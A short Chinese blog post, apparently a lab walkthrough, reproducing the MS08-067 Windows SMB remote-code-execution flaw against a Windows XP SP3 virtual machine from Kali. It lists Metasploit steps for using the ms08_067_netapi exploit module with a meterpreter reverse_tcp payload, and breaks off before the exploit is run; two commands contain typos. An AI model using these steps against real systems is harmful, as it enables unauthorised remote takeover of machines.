admin管理员组

文章数量:1530516

今天闲来无事,打开Kali来了一波MS08-067-netapi的复现
就是服务器服务中的漏洞可能允许远程执行代码
在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。

实验准备

Kali虚拟机
靶机:Windows XP sp3

实验操作

打开Kali和靶机,ifconfig得到Kali IP 192.168.43.120
通过Nmap 扫描得到靶机 IP 192.168.43.201

进入matesploit
首先连接上postgresql

service postgresql statr

寻找ms08_067_netapi模块

search ms08_067_netapi

使用该模块

use exploit/windows/smb/ms08_067_netapi

顺便加载一下payload

windows/meterpreter/reverse_tcp

本文标签: 远程控制漏洞ms08067netapiXPWindows